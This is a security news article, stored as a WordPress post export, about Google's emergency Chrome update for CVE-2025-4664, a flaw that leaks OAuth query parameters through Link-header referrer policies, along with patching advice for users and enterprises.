{"id":3201,"date":"2025-05-15T19:05:00","date_gmt":"2025-05-15T19:05:00","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=3201"},"modified":"2025-05-15T19:05:00","modified_gmt":"2025-05-15T19:05:00","slug":"google-patches-chrome-vulnerability-used-for-account-takeover-and-mfa-bypass","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=3201","title":{"rendered":"Google patches Chrome vulnerability used for account takeover and MFA bypass"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<div class=\"container\"><\/div>\n<p>Chrome users are advised to update their browser immediately to fix a critical vulnerability that is being exploited to launch account takeover attacks.<\/p>\n<p>In some environments, this could even give attackers the ability to bypass multi-factor authentication (MFA).<\/p>\n<p>The recently-reported vulnerability, one of four fixed in a Wednesday update, is tracked as CVE-2025-4664 and affects all versions of Chrome prior to version 136.0.7103.113.<\/p>\n<p>Google\u2019s <a href=\"https:\/\/chromereleases.googleblog.com\/2025\/05\/stable-channel-update-for-desktop_14.html\" target=\"_blank\" rel=\"noopener\">advisory<\/a> says very little about the flaw beyond stating, \u201cGoogle is aware of reports that an exploit for CVE-2025-4664 exists in the wild.\u201d<\/p>\n<p>That explains the urgency of the fix being issued outside the normal update cycle, an \u2018emergency patch\u2019 if you like. These come along occasionally, and given the daily use of browsers, are always a priority for users and admins alike.<\/p>\n<h2 class=\"wp-block-heading\">The vulnerability up close<\/h2>\n<p>The researcher who discovered the flaw, Vsevolod Kokorin of Neplox Security, offers a deeper dive on the issue in <a href=\"https:\/\/x.com\/slonser_\/status\/1919439373986107814\" target=\"_blank\" rel=\"noopener\">his post<\/a> on X (formerly Twitter):<\/p>\n<p>\u201cUnlike other browsers, Chrome resolves the Link header on subresource requests. But what\u2019s the problem? The issue is that the Link header can set a referrer-policy. We can specify unsafe-url and capture the full query parameters,\u201d he wrote.<\/p>\n<p>Link headers are used by websites to tell a browser about important page resources, for example, images, that it should preload. As part of the HTTP response that happens before the browser encounters any HTML, this accelerates response times. When the browser goes hunting for the resource, usually on a third-party server, it transmits a URL containing information about the requesting site, as allowed by the referrer-policy.<\/p>\n<p>Unfortunately, in Chrome this URL can also include information with a bearing on security, such as <a href=\"https:\/\/www.csoonline.com\/article\/562635\/what-is-oauth-how-the-open-authorization-framework-works.html\">OAuth<\/a> flows used for authentication.<\/p>\n<p>\u201cQuery parameters can contain sensitive data \u2014 for example, in OAuth flows, this might lead to an Account Takeover. Developers rarely consider the possibility of stealing query parameters via an image from a third party resource \u2014 which makes this trick surprisingly useful sometimes,\u201d wrote Kokorin.<\/p>\n<h2 class=\"wp-block-heading\">How could this be exploited?<\/h2>\n<p>OAuth provides a way of giving access to something without the need for a password. It\u2019s useful in multiple scenarios, for example, in single sign-on (<a href=\"https:\/\/www.csoonline.com\/article\/510713\/sso-explained-single-sign-on-definition-examples-and-terminology.html\">SSO<\/a>). Users might also encounter it when giving a contact access to a file or document in a cloud service such as Microsoft 365 without passing on their account credentials.<\/p>\n<p>Importantly, OAuth kicks in after <a href=\"https:\/\/www.csoonline.com\/article\/563753\/two-factor-authentication-2fa-explained.html\">MFA<\/a>, which means that if an attacker can trick users into revealing their OAuth token in a URL, they can effectively bypass this control.<\/p>\n<p>The flaw Kokorin discovered is that Chrome was including sensitive data such as this in its query parameters, making it a tempting target for an attacker able to lure someone to a bogus site where this data can be stolen.<\/p>\n<p>Probably not coincidentally, recent weeks have seen a spate of sometimes elaborate attacks attempting to do just this, as <a href=\"https:\/\/www.volexity.com\/blog\/2025\/04\/22\/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows\/\" target=\"_blank\" rel=\"noopener\">documented<\/a> by security vendors. These might or might not be related to the attacks Google talks about in its alert.<\/p>\n<p>The Google update also mentions one other critical flaw, CVE-2025-4609, which, as far as the company knows, is not being exploited. The final two vulnerabilities are not itemized so are, presumably, less serious.<\/p>\n<p>Enterprises looking to patch the vulnerability should look for versions 136.0.7103.113\/.114 for Windows and Mac, and\u00a0136.0.7103.113\u00a0for Linux.<\/p>\n<p>Enterprises should always triage this type of flaw carefully. They need to patch it quickly, but how quickly depends on the likelihood of their being targeted by the exploit.<\/p>\n<p>That risk will currently be modest. However, given that the attackers most likely to be exploiting it are Russian, there is a risk it will spread to ransomware attacks fairly soon.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Chrome users are advised to update their browser immediately to fix a critical vulnerability that is being exploited to launch account takeover attacks. In some environments, this could even give attackers the ability to bypass multi-factor authentication (MFA). The recently-reported vulnerability, one of four fixed in a Wednesday update, is tracked as CVE-2025-4664 and affects [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-3201","post","type-post","status-publish","format-standard","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/3201"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3201"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/3201\/revisions"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3201"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3201"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3201"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}